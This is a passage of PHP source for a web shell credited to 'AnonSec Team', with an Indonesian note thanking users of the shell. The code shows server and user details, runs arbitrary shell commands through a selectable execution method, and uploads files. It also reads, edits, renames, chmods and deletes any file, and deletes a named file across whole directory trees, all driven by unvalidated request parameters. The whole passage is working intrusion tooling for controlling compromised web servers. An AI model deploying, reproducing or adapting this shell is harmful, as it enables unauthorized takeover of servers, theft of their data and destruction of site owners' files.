echo "<b>Software: </b><font color=green>".$_SERVER['SERVER_SOFTWARE']."</font><br />";
echo "<b>PHP version: </b><font color=green>".PHP_VERSION."</font> <b>PHP os:</b> <font color=green>".PHP_OS."</font><br />";
echo "<b>Server Ip: </b><font color=green>".gethostbyname($_SERVER['HTTP_HOST'])."</font><br />";
echo "<b>Your Ip: </b><font color=green>".ip()."</font><br />";
echo "<b>User: </b><font color=green>$user</font> ($uid) | <b>Group:</b> <font color=green>$group</font> ($gid)<br />";
echo "<b>Safe Mode: </b>$sm<br />";
echo "<kbd>Disable Function:</kbd><pre>$disfc</pre>";
echo '</div>
</div>
</div>';
}
elseif($_GET['id'] == 'about'){
echo '<br />'.$▘.'
<div class="container">
<div class="card text-dark">
<div class="card-header">';
echo "<img alt='AnonSec Team' class='img-thumbnail rounded mx-auto d-block' src='//unknownsec.ftp.sh/AnonSec.jpg' width='150px'>";
echo "<b>- About Me -</b><br />";
echo "Thanks bre dah pake shell nya, jika ada yang error silahkan hubungi email di bawah.<br />Greetz : <a href=''>{ AnonSec Team } - And You</a><br />My email: <a href='mailto:unknownsec1337@gmail.com'>unknownsec1337@gmail.com</a>";
echo '</div>
</div>
</div>';
}
elseif($_GET['id'] == 'cmd') {
echo "$▘<br>
<form method='POST'>
<div class='input-group mb-3'>
<input class='form-control' type='text' name='cmd' value='$cmd'>
<select class='bg-dark text-light form-control' name='execCMD'>
<option>$method</option>";
ob_start();
$methodArray = ekse();
ob_end_clean();
foreach ($methodArray as $value) {
echo "<option>$value</option>";
}
echo '</select>
</div>
</form>';
if($cmd == "") {
echo "
<div class='card text-dark'>
<div class='card-header'>
<pre>";
ekseCMD("whoami", $method);
echo '</pre>
</div>
</div>';
}else {
echo "
<div class='card text-dark'>
<div class='card-header'>
<pre><kbd>~$ ".$cmd."</kbd><br>";
ekseCMD($cmd, $method);
echo "</pre>
</div>
</div>";
}
}
elseif($_GET['id'] == 'upload'){
echo '<br />'.$▘.'
<form action="" method="post" enctype="multipart/form-data">
<div class="input-group mb-3 text-center">
<input type="file" class="form-control form-control-sm" name="file">
<button type="submit" class="btn btn-outline-light btn-sm">Submit</button>
</div>
</form>';
if(isset($_FILES['file'])){
if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success upload",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed upload",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
}
}
elseif($_GET['id'] == 'delete'){
function hapus_massal($dir,$namafile) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$▚ = $dirc.'/'.$namafile;
if($dirb === '.') {
if(file_exists("$dir/$namafile")) {
unlink("$dir/$namafile");
}
} elseif($dirb === '..') {
if(file_exists("".dirname($dir)."/$namafile")) {
unlink("".dirname($dir)."/$namafile");
}
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
if(file_exists($▚)) {
echo "[<font color=green>deleted</font>] $▚<br>";
unlink($▚);
$▟ = hapus_massal($dirc,$namafile);
}
}
}
}
}
}
}
if($_POST['start']) {
echo "<div style='margin: 5px auto; padding: 5px'>";
hapus_massal($_POST['d_dir'], $_POST['d_file']);
echo "</div>";
} else {
echo "<br />$▘
<form method='post'>
<b><i class='bi bi-folder'></i> Lokasi:</b>
<input class='form-control' type='text' name='d_dir' value='$dir' height='10'>
<b><i class='bi bi-file-earmark'></i> File name:</b>
<div class='input-group mb-3'>
<input class='form-control' type='text' name='d_file' placeholder='name file' height='10'><br>
<div class='input-group-append'>
<input class='btn btn-outline-light' type='submit' name='start' value='Go'>
</form>
</div>
</div>";
}
}
}
// akhir tools
if(isset($_GET['filesrc'])){
echo "<br><b>name : </b>".basename($_GET['filesrc']);"</br>";
echo '<textarea class="form-control" rows="7" readonly> '.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea><br />';
}
elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
echo '<br><b>name : </b>'.basename($_POST['path']);'</br>';
//Chmod
if($_POST['opt'] == 'chmod'){
if(isset($_POST['perm'])){
if(chmod($_POST['path'],$_POST['perm'])){
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success Change Permission",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed change permission",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
}
echo '<form method="POST">
<div class="input-group mb-3">
<input class="form-control" name="perm" type="text" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'"/>
<input class="form-control" type="hidden" name="path" value="'.$_POST['path'].'">
<input class="form-control" type="hidden" name="opt" value="chmod">
<div class="input-group-append">
<input class="btn btn-outline-light" type="submit" value="Go"/>
</form>
</div>
</div>';
}
//rename folder
elseif($_GET['opt'] == 'btw'){
$cwd = getcwd();
echo '<form action="?option&path='.$cwd.'&opt=delete&type=buat" method="POST">
<div class="input-group mb-3">
<input class="form-control" name="name" type="text" value="Folder"/>
<input class="form-control" type="hidden" name="path" value="'.$cwd.'">
<input class="form-control" type="hidden" name="opt" value="delete">
<div class="input-group-append">
<input class="btn btn-outline-light" type="submit" value="Go"/>
</form>
</div>
</div>';
}
//rename file
elseif($_POST['opt'] == 'rename'){
if(isset($_POST['newname'])){
if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success change name",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed change name",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
<div class="input-group mb-3">
<input class="form-control" name="newname" type="text" value="'.$_POST['name'].'" />
<input class="form-control" type="hidden" name="path" value="'.$_POST['path'].'">
<input class="form-control" type="hidden" name="opt" value="rename">
<div class="input-group-append">
<input class="btn btn-outline-light" type="submit" value="Go"/>
</form>
</div>
</div>';
}
//edit file
elseif($_POST['opt'] == 'edit'){
if(isset($_POST['src'])){
$fp = fopen($_POST['path'],'w');
if(fwrite($fp,$_POST['src'])){
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Edit file Success",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed edit file",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
fclose($fp);
}
echo '<form method="POST">
<textarea class="form-control" rows="7" name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
<input class="form-control" type="hidden" name="path" value="'.$_POST['path'].'">
<input class="form-control" type="hidden" name="opt" value="edit">
<input class="btn btn-outline-light" type="submit" value="Go"/>
</form><br />';
}
}else{
//delete dir
if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
if($_POST['type'] == 'dir'){
if(rmdir($_POST['path'])){
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success delete dir",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed delete dir",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
}
//delete file
elseif($_POST['type'] == 'file'){
if(unlink($_POST['path'])){
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success delete file",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed delete file",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
}
}
echo '</center>';
$scandir = scandir($path);
$pa = getcwd();
echo '<div class="table-responsive">
<table class="table table-hover table-dark text-light">
<thead>
<tr>
<td class="text-center">Name</td>
<td class="text-center">Last edit</td>
<td class="text-center">Size</td>
<td class="text-center">Permission</td>
<td class="text-center">Options</td>
</tr>
</thead>
<tbody class="text-nowrap">';
foreach($scandir as $dir){
$dt = date("Y-m-d", filemtime("$path/$dir"));
if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
echo "
<tr>
<td><i class='bi bi-folder-fill'></i><a class='text-decoration-none text-secondary' href=\"?path=$path/$dir\">$dir</a></td>
<td><center>$dt</center></td>
<td><center>DIR</center></td>
<td><center>";
if(is_writable("$path/$dir")) echo '<font color="green">';
elseif(!is_readable("$path/$dir")) echo '<font color="red">';
echo p("$path/$dir");
if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
echo "</center></td>
<td>
<form method=\"POST\" action=\"?option&path=$path\">
<div class='input-group mb-3 text-center'>
<select class=\"form-select form-select-sm\" name=\"opt\">
<option selected disabled>Select</option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"dir\">
<input type=\"hidden\" name=\"name\" value=\"$dir\">
<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
<input class=\"btn btn-outline-light btn-sm\" type=\"submit\" value=\"Go\"/>
</form>
</div>
</td>
</tr>";
}
foreach($scandir as $file){
$ft = date("Y-m-d", filemtime("$path/$file"));
if(!is_file($path.'/'.$file)) continue;
$s = filesize($path.'/'.$file)/1024;
$s = round($s,3);
if($s >= 1024){
$s = round($s/1024,2).' MB';
}else{
$s = $s.' KB';
}
echo "
<tr>
<td><i class='bi bi-file-earmark-code-fill'></i><a class='text-decoration-none text-secondary' href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
<td><center>$ft</center></td>
<td><center>$s</center></td>
<td><center>";
if(is_writable("$path/$file")) echo '<font color="green">';
elseif(!is_readable("$path/$file")) echo '<font color="red">';
echo p("$path/$file");
if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
echo "</center></td>
<td>
<form method=\"POST\" action=\"?option&path=$path\">
<div class='input-group mb-3 text-center'>
<select class=\"form-select form-select-sm\"name=\"opt\">
<option selected disabled>Select</option>
<option value=\"delete\">Delete</option>
<option value=\"edit\">Edit</option>
<option value=\"rename\">Rename</option>
<option value=\"chmod\">Chmod</option>
<option value=\"download\">Download</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"path\" value=\"$path/$file\">
<input class=\"btn btn-outline-light btn-sm\" type=\"submit\" value=\"Go\"/>
</form>
</div>
</td>
</tr>";
}
}
echo "
</tbody>
</table>
<div class='text-center'>
<kbd>Copyright © ".date("Y")." - $▛</kbd>
</div>
</div>
</div>
</div>
</div>
<script src='//code.jquery.com/jquery-3.3.1.slim.min.js'></script>
<script src='//cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js'></script>
<script src='//stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js'></script>
</body>
</html>";
?>